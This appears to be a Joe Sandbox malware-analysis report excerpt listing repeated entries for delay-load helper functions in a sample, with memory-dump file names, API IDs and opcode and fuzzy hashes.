                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 463a72dc456e6df50742bf8ced3830aec0ec44a7f163771413d94b23f2be1aa1
                                                                                              • Instruction ID: 7dd615f64d3e4d95a9b2f4915bd73770bcfc897c99d102835ad20491b07d1836
                                                                                              • Opcode Fuzzy Hash: 463a72dc456e6df50742bf8ced3830aec0ec44a7f163771413d94b23f2be1aa1
                                                                                              • Instruction Fuzzy Hash: 99B012B226D502ECB14C62C47D82D37030DC4D1B11335C11BF589E40C0DBC06C490931
                                                                                              Function 0010D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 339a98be3fe2bc2b087a87926a9d9e4ed25e92643d0d8cd586af750bf7299d93
                                                                                              • Instruction ID: 2f6b247cdde48b1b0bb42f24c94c7a357a47f3e1663233b43aae53b68d10a555
                                                                                              • Opcode Fuzzy Hash: 339a98be3fe2bc2b087a87926a9d9e4ed25e92643d0d8cd586af750bf7299d93
                                                                                              • Instruction Fuzzy Hash: A1B012B326D402ECB10C61C47D82D37030DC4D2B11334C01BF989E40C0D7C06C090931
                                                                                              Function 0010D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 29b85e0757c20c6c185b91a0bf708822d37c451a4dd7fed2cce8afe19563a37b
                                                                                              • Instruction ID: 20532ccda29be8d68eafdae036de0a089b6b3865a6ad39e498b7fbc14b7d0d08
                                                                                              • Opcode Fuzzy Hash: 29b85e0757c20c6c185b91a0bf708822d37c451a4dd7fed2cce8afe19563a37b
                                                                                              • Instruction Fuzzy Hash: 40B012B227D402ECB10C61D47D82D37034DC8D1B11334C01BF589E40C0D7C06C090931
                                                                                              Function 0010D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8e6686ed1d505094dfd29c6bc3f504c7574ddb0aab1b5296ee8dfffcaeff410d
                                                                                              • Instruction ID: 52ad500749811b22551b377ad723100b31bfca8816c45719439ed3b0a9e6ab23
                                                                                              • Opcode Fuzzy Hash: 8e6686ed1d505094dfd29c6bc3f504c7574ddb0aab1b5296ee8dfffcaeff410d
                                                                                              • Instruction Fuzzy Hash: F5B092A226C402ACA108619579829360248C482B11325C01AFA89E40C0D7C068090931
                                                                                              Function 0010D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b58dce608b2fb74d6084716603338d417d0b48f6077a465f25d1eb791faee850
                                                                                              • Instruction ID: ad6fe81cac83d3d2f5ec17e6d3ab602b905126014f9fb072892415d2b498dc4d
                                                                                              • Opcode Fuzzy Hash: b58dce608b2fb74d6084716603338d417d0b48f6077a465f25d1eb791faee850
                                                                                              • Instruction Fuzzy Hash: F3B012F226C402ECB10C61C57E82D37038CC4C2B11334C01BF589E40C0D7C06C0A0931
                                                                                              Function 0010DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 64450b70dff5ff38b04508efe7d4b0ce94b3732b2527acbbdb9d5799a974b8c7
                                                                                              • Instruction ID: a6521f1904dfa2b24c1e8959b6ff7cc6a43a105015feb73ada7ebddab2310e63
                                                                                              • Opcode Fuzzy Hash: 64450b70dff5ff38b04508efe7d4b0ce94b3732b2527acbbdb9d5799a974b8c7
                                                                                              • Instruction Fuzzy Hash: 53B092A236D002ECA10861897902A3A0248C088B11320851AB549D50C897C0580A8832
                                                                                              Function 0010DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 21a1cd91326e7d2b96951ebdec703deb1eb767caa005112022d7659ec4df70aa
                                                                                              • Instruction ID: db162a30103a44d2458b884ea945d400ba32d9eee95c21c627b5efe6199cde67
                                                                                              • Opcode Fuzzy Hash: 21a1cd91326e7d2b96951ebdec703deb1eb767caa005112022d7659ec4df70aa
                                                                                              • Instruction Fuzzy Hash: B7B012B336D102ECB10C71C97D02D3A034CC0C4B21330C11BF849D50C8D7C45C098832
                                                                                              Function 0010DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DAB2
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 9a2efe98d2488b04a541107c6acc582d05792944f9a24385d5a0293fdf53e380
                                                                                              • Instruction ID: a3790b4c19f65d83bda3c80b5a43a4ba7a3d5d5346911b49574c831fe11dba73
                                                                                              • Opcode Fuzzy Hash: 9a2efe98d2488b04a541107c6acc582d05792944f9a24385d5a0293fdf53e380
                                                                                              • Instruction Fuzzy Hash: 0FB012B23AD106ECF10C71C97D42E3B034CD0C4B11330811BF449D50C8D7C06C098932
                                                                                              Function 0010DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a0acd740e51a0ce11ae07c61adb806211e79dca99cd36f2f07becb84a14ef00f
                                                                                              • Instruction ID: 002fdfeeb4b9e4f686c5d7be6fffff7a9fdd055d0a6a2f3f7c4906d0f0bca545
                                                                                              • Opcode Fuzzy Hash: a0acd740e51a0ce11ae07c61adb806211e79dca99cd36f2f07becb84a14ef00f
                                                                                              • Instruction Fuzzy Hash: 58B012B636D006ECB10C51943D07E37132CD4C1B11332803AF55AD50C0DBD04C0D4431
                                                                                              Function 0010DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1bf33d8e979155e2333f55730d78a145b93bdb284c66b5ef59dbf8a568aa53f0
                                                                                              • Instruction ID: 031159c0aac4747dd6f9ae11252614996d3e748ba620aafd50d6740682e0078c
                                                                                              • Opcode Fuzzy Hash: 1bf33d8e979155e2333f55730d78a145b93bdb284c66b5ef59dbf8a568aa53f0
                                                                                              • Instruction Fuzzy Hash: FFB092A626D10AACA20811803D06C361228C481B11322812AF545A40C09BD04C494431
                                                                                              Function 0010DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4534f91df9c6b77d4b8047b4c28ad4f07cc3478d6b65ebfd622dbca2228151c5
                                                                                              • Instruction ID: 3c05a09fba0661baa785aa1538c2d7f28abed62c18997d04c2e088ae16375cb4
                                                                                              • Opcode Fuzzy Hash: 4534f91df9c6b77d4b8047b4c28ad4f07cc3478d6b65ebfd622dbca2228151c5
                                                                                              • Instruction Fuzzy Hash: 20B012B636D007ECB14C51843E07D37132CC4C1B11332C02AF649D40C0DBD04C0A4431
                                                                                              Function 0010DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DBD5
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 845bb170da6d01c4435dddf3ed4f8d826f35c775ef616135b79febf60844baf2
                                                                                              • Instruction ID: 38e4add22b240a1d38fd06041b7e810907ffc59ce9b42c9de7811f5b9d21b878
                                                                                              • Opcode Fuzzy Hash: 845bb170da6d01c4435dddf3ed4f8d826f35c775ef616135b79febf60844baf2
                                                                                              • Instruction Fuzzy Hash: 67B092A626D006ECA10C518439069361228C481B21322802AF949D50C4DBD04C094431
                                                                                              Function 0010DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8bce1226a9077a068e4e4f335fb527ed3250375f6556d4c906a2e94ced2eb6bf
                                                                                              • Instruction ID: 5be400c783581510f2a61728c473c917f44e00cb55d58ff174ce3f3b07ee0528
                                                                                              • Opcode Fuzzy Hash: 8bce1226a9077a068e4e4f335fb527ed3250375f6556d4c906a2e94ced2eb6bf
                                                                                              • Instruction Fuzzy Hash: 32B012B626C202FCB10C21807F42C37032CC5C0B11336861EF649F40C4DBC06C495431
                                                                                              Function 0010DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 01a94411e958c41bf9b51c8fcd9e710761f816368bfea9f9d736026cc3c68a07
                                                                                              • Instruction ID: d436c8683849095efa2b583bcdfe0df92935ee7449afcefb6a7f8f82b4d88774
                                                                                              • Opcode Fuzzy Hash: 01a94411e958c41bf9b51c8fcd9e710761f816368bfea9f9d736026cc3c68a07
                                                                                              • Instruction Fuzzy Hash: AAB012B726C102ECB10C61847E42D37032CC4C5B11335C51EFA4DE40C4D7C05C094431
                                                                                              Function 0010DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010DC36
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
